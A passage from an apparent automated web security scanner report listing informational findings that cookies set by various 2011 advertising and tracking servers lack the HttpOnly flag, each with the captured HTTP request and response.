GET /pixel;r=571074855;fpan=0;fpa=P0-87169230-1303163602430;ns=0;url=http%3A%2F%2Fwww.linkedin.com%2Fpub%2Fsocial-follow%2F12%2F7a2%2F294;ref=;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1304721583769;tzo=300;a=p-b3sGjMtCFrexE HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.linkedin.com/pub/social-follow/12/7a2/294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EDkAGO8kjVmtjIMIufKMgQGxAQHXBoGUAJrRo6lXiz0cxeKLPR1KLMUgsqNMEf4RDCAMHxCCDxAwQBhaKIEbtgqRksdDECEYILsywS0zgSggMC4a4w_xkgDokgDhAL4gtksQgtGLKxlKOLIw

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ad.yieldmanager.com/pixel?id=1099177&id=669181&id=734723&id=1157704&t=2
Set-Cookie: d=EM0AGO8kjVmtjIMIufKMgQG9AQHXBoGUAJrRo5lYEPGaOCbTzF4os9HUosxSCyo0wR_hEMIAwfEIIPEDBAGFoogRu2CpGSx0MQIRgguzLBLTOBKCAwLh6DS1OvFE0gDokgDhAL4gtksQgtGLKxlKOLIw; expires=Thu, 04-Aug-2011 17:39:45 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Fri, 06 May 2011 17:39:45 GMT
Server: QS

18.141. http://pts.eyewonder.com/ewr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pts.eyewonder.com
Path:   /ewr

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ewr?cid=20019204&versionid=19 HTTP/1.1
Host: pts.eyewonder.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=46431933753; mojo3=10295:2568/17671:21707

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ew=MDAwMTMwMzI5Njc5OTg5MjAwMTY0NTQwMjBfMTMwNDcxMDMxMzMxMl8xMDBfX18w; Domain=.eyewonder.com; Expires=Fri, 01-Jul-2011 19:31:53 GMT; Path=/
Set-Cookie: ewroi=""; Domain=.eyewonder.com; Expires=Fri, 01-Jul-2011 19:31:53 GMT; Path=/
P3P: CP="NON DSP COR NID CURa PSAa PSDa OUR STP UNI COM NAV STA LOC OTC", policyref="http://pts.eyewonder.com/static/ew/w3c/p3p_eyewonder.xml"
gmtdiid: 8a9f17852f9b8836012fa35146a40689
Content-Type: text/javascript;charset=US-ASCII
Date: Fri, 06 May 2011 19:31:52 GMT
Content-Length: 442
Connection: keep-alive

/*CreatedOn:1304710313312*/var ew20019204_dynamicAdModel={acid:0,adid:201806,eid:20019204,tid:0,emv:2,uid:'00013032967998920016454020',vid:'001303296799892000000034480857',trk:'',geo:{city:'Dallas',re
...[SNIP]...
18.142. http://pub.kroogy.com/www/delivery/ajs.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pub.kroogy.com
Path:   /www/delivery/ajs.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/ajs.php?zoneid=1&target=_top&cb=58170801237&charset=UTF-8&loc=http%3A//kroogy.com/pub/banner_160_600.php&referer=http%3A//kroogy.com/search/web/Linkbucks%2520vlad%2520modelS HTTP/1.1
Host: pub.kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/pub/banner_160_600.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=221607367.144172721.1303647943.1303658380.1303738749.6

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:03:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=f5cb8c822a14a887c5522900016c44c4; expires=Sat, 05-May-2012 22:03:32 GMT; path=/
X-Powered-By: PleskLin
Content-Length: 684
Connection: close
Content-Type: text/javascript; charset=UTF-8

var OX_c8101c58 = '';
OX_c8101c58 += "<"+"iframe allowtransparency=\"true\" src=\"http://ads.betfair.com/ad.aspx?bid=2022&pid=67732\" width=\"160\" height=\"600\" marginwidth=\"0\" marginheight=\"0\"
...[SNIP]...
18.143. http://pub.kroogy.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pub.kroogy.com
Path:   /www/delivery/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/lg.php?bannerid=148&campaignid=19&zoneid=1&loc=http%3A%2F%2Fkroogy.com%2Fpub%2Fbanner_160_600.php&referer=http%3A%2F%2Fkroogy.com%2Fsearch%2Fweb%2FLinkbucks%2520vlad%2520modelS&cb=2647af36d4 HTTP/1.1
Host: pub.kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/pub/banner_160_600.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=221607367.144172721.1303647943.1303658380.1303738749.6; OAID=1fa74d4f050e605dbcd14f816c36cb53

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:03:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=1fa74d4f050e605dbcd14f816c36cb53; expires=Sat, 05-May-2012 22:03:32 GMT; path=/
Content-Length: 43
X-Powered-By: PleskLin
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;
18.144. http://sales.liveperson.net/hc/56727252/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/56727252/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/56727252/?&site=56727252&cmd=mTagKnockPage&lpCallId=990398541325-774317765142&protV=20&lpjson=1&id=2813141930&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-software-soa-english-2%7ClpMTagConfig.db1%7ClpButton_2%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.dynamicperimeter.com/download/Intel_Expressway_Tokenization_Broker/?partnerref=googletokenization&gclid=CMLLqMvV1KgCFUSo4AodlBcAgw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16601209214853,d=1303177644; _mkto_trk=id:220-ESA-932&token:_mch-liveperson.net-1304643823223-44198; ASPSESSIONIDQAAASBQA=ANKDKPNBJPKBNENOBMHMELBD

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:21:39 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=8422150136621369598; path=/hc/56727252
Set-Cookie: HumanClickKEY=8422150136621369598; path=/hc/56727252
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sat, 07 May 2011 01:21:39 GMT
Set-Cookie: HumanClickSiteContainerID_56727252=STANDALONE; path=/hc/56727252
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 29209

lpConnLib.Process({"ResultSet": {"lpCallId":"990398541325-774317765142","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...
18.145. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=40809&partnerID=228&clientID=4714&key=segment&pb=0 HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; dp_rec="{\"1\": 1304340350+ \"3\": 1304301926+ \"2\": 1304243633+ \"5\": 1304340362+ \"4\": 1304340367}"; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1=eJzjkuFYeZZVgFGi83vbOxYFRo2Tz9vfsRgwWoD5XCIc9w6wCjBJbLnw6y2LAoMGgwGDBQNQ9MpnFqCe9Wiir4CiTBLPFv1AEV0xH2T+5L7TKKI77zMDRWfNX4sQBQBNEijP; io_freq_p1="eJzjEua4GiHAKNH5ve0diwGjBZjmEuZY7yrAJLHlwq+3LAoMGgwGDBYMQMHjgQLMEuvRBLeFArVP7juNIrjXBSg4a/5ahCAAdLEcdQ=="; segments_p1="eJzjYuZojOBi4Wj6zwQkm4EkEwcHkNXZwczFzDFRBcic9JQJyJxuDGTO/AFSNQdMzv0BEl4QDGSu3c8IZG4sBjJ37GLk4uLYuY9Z4NDBZe9YgCJ734Mk9/sBmQe7GYHkoSMgjUdzgMzjT0AmnQCTJ8Hmnc4BEudAche+g0Qv7gWRTy6ANL7YzQwk34LJdwdA7vvHASLCAdDNM/A="

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:13:30 GMT
Set-Cookie: segments_p1=eJzjYuZYEMzFzHE0h4uF48QTJiB5sJsRSE56ygQUbowAEudygMRpkILjYAU7djECBf6FA5l734OY042BzDk/QHLvDjADyc4OEDn3B8iIiSpA5ovdzFxcHDv3MQscOrjsHQsXEwcHUGpjMVDqyQWQdSfBut/uBum78B3EPnQERM4Eizf/B5n0jwPIbAIz9/sBmRf3guRe7gORa/czAgDZyTWv;Path=/;Domain=invitemedia.com;Expires=Sat, 05-May-2012 19:13:30 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Content-Length: 43
Connection: close
Server: Jetty(7.3.1.v20110307)

GIF89a.............!.......,...........D..;
18.146. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543557/sid.6543598/sid.6543551  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segs.btrll.com
Path:   /v1/tpix/-/-/-/-/-/sid.6543557/sid.6543598/sid.6543551

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/tpix/-/-/-/-/-/sid.6543557/sid.6543598/sid.6543551 HTTP/1.1
Host: segs.btrll.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BR_MBBV=Ak2t54ZK4gSTAbNTSdI; DRN1=AGPX0VFwToY

Response

HTTP/1.1 302 Found
Date: Sat, 07 May 2011 01:31:05 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak2t54ZK4gSTAbNTSdI; expires=Sat, 05-May-2012 01:31:05 GMT; path=/; domain=.btrll.com
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: DRN1=AGPX0VFwToYAY9jFTmLU2QBj2O5OYtTZAGPYv05i1Nk; expires=Mon, 06-May-2013 01:31:05 GMT; path=/; domain=.btrll.com
Location: http://cache.btrll.com/default/Pix-1x1.gif
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

18.147. http://serw.clicksor.com/newServing/tracking_id.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://serw.clicksor.com
Path:   /newServing/tracking_id.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /newServing/tracking_id.php?b=1&UID=13046968344368&TRSTR=1&RTID= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: serw.clicksor.com

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 15:47:14 GMT
Server: Apache/2.2.17 (Fedora)
X-Powered-By: PHP/5.3.5
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: TRUID=13046968344368; expires=Thu, 01-Mar-2012 15:47:14 GMT; path=/; domain=.clicksor.com
Set-Cookie: CKTIME=1304696834; expires=Thu, 01-Mar-2012 15:47:14 GMT; path=/; domain=.clicksor.com
Set-Cookie: RTID=deleted; expires=Thu, 06-May-2010 15:47:13 GMT; path=/; domain=.clicksor.com
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

18.148. http://stats.kroogy.com/cnt-gif1x1.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.kroogy.com
Path:   /cnt-gif1x1.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cnt-gif1x1.php?e=1920.1200&d=16&r=&p=http%3A//kroogy.com/search/web/Linkbucks%2520vlad%2520modelS&t=Kroogy%20Search%20-%20web%20-%20Linkbucks%20vlad%20modelS HTTP/1.1
Host: stats.kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web/Linkbucks%20vlad%20modelS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cnscc=1303647928; __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; cnsuser_id=3793874385; __utma=221607367.144172721.1303647943.1303658380.1303738749.6

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:03:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="/w3c/p3p.xml", CP="UNI"
Set-Cookie: cnsuser_id=2473886814; expires=Sun, 06-May-2012 23:59:59 GMT; path=/
Pragma: no-cache
Cache-control: no-cache
X-Powered-By: PleskLin
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;
18.149. http://sync.mathtag.com/sync/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync/img?mt_exid=10002&redir=http://tags.bluekai.com/site/2948?phint=idswap_partner=bk&id=PARTNER_UUID HTTP/1.1
Host: sync.mathtag.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2576?ret=html&phint=u=9b6b0&phint=ord=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1304360412; ts=1304525946

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x4 pid 0x412d 16685
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sat, 07 May 2011 11:25:04 GMT
Location: http://tags.bluekai.com/site/2948?phint=idswap_partner=bk
Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07
Connection: Keep-Alive
Set-Cookie: ts=1304767504; domain=.mathtag.com; path=/; expires=Sun, 06-May-2012 11:25:04 GMT
Content-Length: 0

18.150. http://tags.bluekai.com/site/2576  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2576

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2576?ret=html&phint=u=80312807C795402E93C5016D2A2A3E1B&phint=ord=7169916033744.81 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2588797;type=nausc826;cat=naush555;u=80312807C795402E93C5016D2A2A3E1B;ord=7169916033744.81?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101KjjLzXU9Wj/OQG=; bko=KJ0E8VBQrncbQvXuQ0uDJzQxJLM9R1mdp8KHRH/q96BJpDa4EQRqGJQoV10qaXJiRAiWLoQj3GObE0fj9jxNjZ5Qt95ZlKsabsPiD/Vp9/hpszW=; bkst=KJh5Mp2ny69RhZXGYeSNQbBxcaye2dK2mlYyNkQPuG7HMGGUnArQcVGuWz5IQrnAnGGGnG/m/rMQfmJ7zcOhzdVu34CmhdwX7F52gGSK88sqibrUUQt2r4zvioZk9gMNoEns8TAPFLWW4stBPPjCeoCBFITzdIcTmjxB6IsGs/oZrKncuRr/ux0QvKBuW1WW1vWwFY57BILpi5D36S+UYDb6GC0Goa09JOEDVZPwjCwcjb2mm74u1+JCKOnF2DVtHqKw8cgvXt8W/yNj6rImGTlmqIFOLjKmUDv55C9aFDs/QbpReUqAmeLW6XfcXKRGgUGNFnJWKjyoyWHEvoDgx2E6I2qjgxjYcigbNCE+Dfb4elnFripltuiqu9OCOOKR6/HQM/NmRQnvzvwMOsn2d7MFtJra4Ndd9NrqRq1=; bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9LWDU/L1aGCirsuaAEicJzewXHjnh19EJPemz9avYen5BWEnqQsylpA3sYIyQ1E+nWJ7Jn0lmyvO3yzeQha7BG1qWy1eYAmXaAo7sd9sGQLzvS9yehexKWO1GX82cJGsHxHBJCQLr/bUm0v9BkiAO0pOYjEC8o8Ly1rQM0EYC0OuYj/9rI1//YGByKTxnFsyH27YMtcwqeZWS1TooqZe2NP9hjelrRJAuaOAtlo38M9p+eQy1SHnPeYkQLHzmWOzXOqG9PKRkAG0OW0xVxYfQjsOpHGHNee9VsUQgsPTyQl0blQ6uNA0Pe9hfAVuRsHRM0Uppxeq+794YB9YWAATJ; bk=bhbvxbkYUciVIHOf; bkc=KJh56gNnxkWROFe7bmNe1N0vy1vQpYvixuyGkthgrsL6BWuT+W5DsBy/AjGvJYaGfrmYeuTBJKg46O9WDA7xWBHuNaE7FUsX2plMMdrX8pf7yyGO6DsOISIStRRDnm71eoiUe55N9Pha9awSChfcJztDPpft92rpyc3tjLowMM2ZraX6c6Npct3Z2jPdjqIaQLY2UVN8R/DfwzA5sKVIMUw4hqE84EeEd8DwrrHImQxv7hUEMNfcf8Gog2yj9OG8KzjthjA7ft8yV8ooUMAHOo3w9GrUgoX6DNfjeQnk1MOtfM3PTbSXzgxqVOGHYc7XaQzp8jPF8nhHO6fmUmKcrYZFFYqf4EzaoL/P6TOyccdZc+RXn+IMNfT+fr9Z2IL35lX4BdPHBrU2dOQYzIcd4rEWOJQogh0xI0XZOzGUN06lR+p6Ug0ZKKPtb5voQmNhP71CbEGQpb2SOcBZMp++zEFlbk7F/zqUol8KDpdkw6Ixtv/=

Response

HTTP/1.0 200 OK
Date: Fri, 06 May 2011 22:33:36 GMT
Set-Cookie: bklc=4dc47740; expires=Sun, 08-May-2011 22:33:36 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=hClmGTTKarbVIHOf; expires=Wed, 02-Nov-2011 22:33:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56XXgHaWDOdeFBzIwsSmjhDQBMV/1uzG6aeqsprJ+LqYxjZ1FFbJsAkijZAyoSp2KMzPLnJCZJ7IYCPnYoYyDstnawRdgFUmU7d3KzX228fbQe8Mm9sBnPbR9WJuK6M0orUbnK0eWwV1TEFrOunF9IW4jg1VGf5xbZYZFUJaajtc9kv8O0cjK1IVP2pl9bQiyLaStp0mdeU1dSzT1zK2ooFfvllvIiSp9MPUb52LL5fv4m2pB4H7MFG832E+QoFmP5hFk4KGaLr2a6TBZtbISvSdzT9Ur8c8uP+srJtXLz3zNDfN0w9ODfyDZEh6dSvSXLiUlUuQ9wzKmHfKTvSXzSjnFgDF9fdJne10DPfbx2DRameC0FBlOEU7kKE74jNPQ1a96exMqLD4rELt2XMtbUqwYfPFZ4ofMqZlCo7ZDEqZ4n6BQnw9fcp7KOtqf4dZpP2Tdkh9G7JpdI0fvEKdaqSoUgowmcyoRn32opiRzKIUlvIU97BgAE3S8fqtbI+NsKUISpttSEdAcBGw7lx==; expires=Wed, 02-Nov-2011 22:33:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJ0qh1q9TaOIhJKnTxTF96BJpDa4JQjPmWrVMTcChrGeFAG1AkYV/WmR/9mee4XIU6Rss0ena1p08GVyZOQuGuhZCi3QMoBn5QOkM5AjswSOVxYgmOZ1; expires=Wed, 02-Nov-2011 22:33:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJh5MfNv96WDCSz/YsjMYALCVBQrpmI5sqO/Ms+DYsa5ESAT0tyEu/3Tr0vVwAsyLC5aaO+OYNWDLqqhsuhLfs05luoT3X+lpgkpoG/Kj8sqLTr7qQD2rl6sozwOzJxwZdZqxbXmnSsRVu39VNX3Rl0KVmWqE1eUNkCkaKS9tKEghFAdoAI/K7cNhba8hYxs6JHhvRCQ9oMxr2beAIFP3zH0ZKCV0yx7VkWmPa/rxO/v3k7vJ2mJQI1UC6T5VAxbe9dMfj8/NI7sFkyjXvyE6DCeZFxbTtiNd5rTz28p8NN9fPRxO5NIi/16lyGt8EM592wvhFcSSaet37kaiKJhoQ9EESkDgQhHAI2gJp53YcAGfNZE+TfTE+qwF1rilsK+SY/OCOazRW/EQMWtmGAJv1mBMCm/24F2g4BKp4lfICdG+t54; expires=Wed, 02-Nov-2011 22:33:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJhM6tJQRmY3jK9YDA/1MdxjsOQjmnAmEs5QI9KV3VETOSHRsHnzWeJq5YW0/eNzeBK1Wev7AsuTs4Ti0UQRQZu3sDT9vDsstbR/ZVN9+C+7Jz1a5oYR7uV/pmuUaZ5QDnPQRceigsjxRtJQRsc/2ynJEswI9aEORyD6CQaisQI/YjE8p0mEy1iQiuEeOjKHDZ5A69qnk/OksvW07npEEHQj2JaAZaOAYAW0xO5XRxuaxqQ2yQPK+QCfracLrVtc1/6jhExlLw833Oi0c7KyE9ZveO+FpPhsC7RcOGR6iV3saneRYyK/Y8TYUR93XhJJhL9JWQLQal90LeAMyMGss/L1FJD1n8COwklFOQkgoAGsCgN/1Ly1i8aAF7AQZlqm9tWS9njCDPQ=; expires=Wed, 02-Nov-2011 22:33:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sat, 07-May-2011 22:33:36 GMT; path=/; domain=.bluekai.com
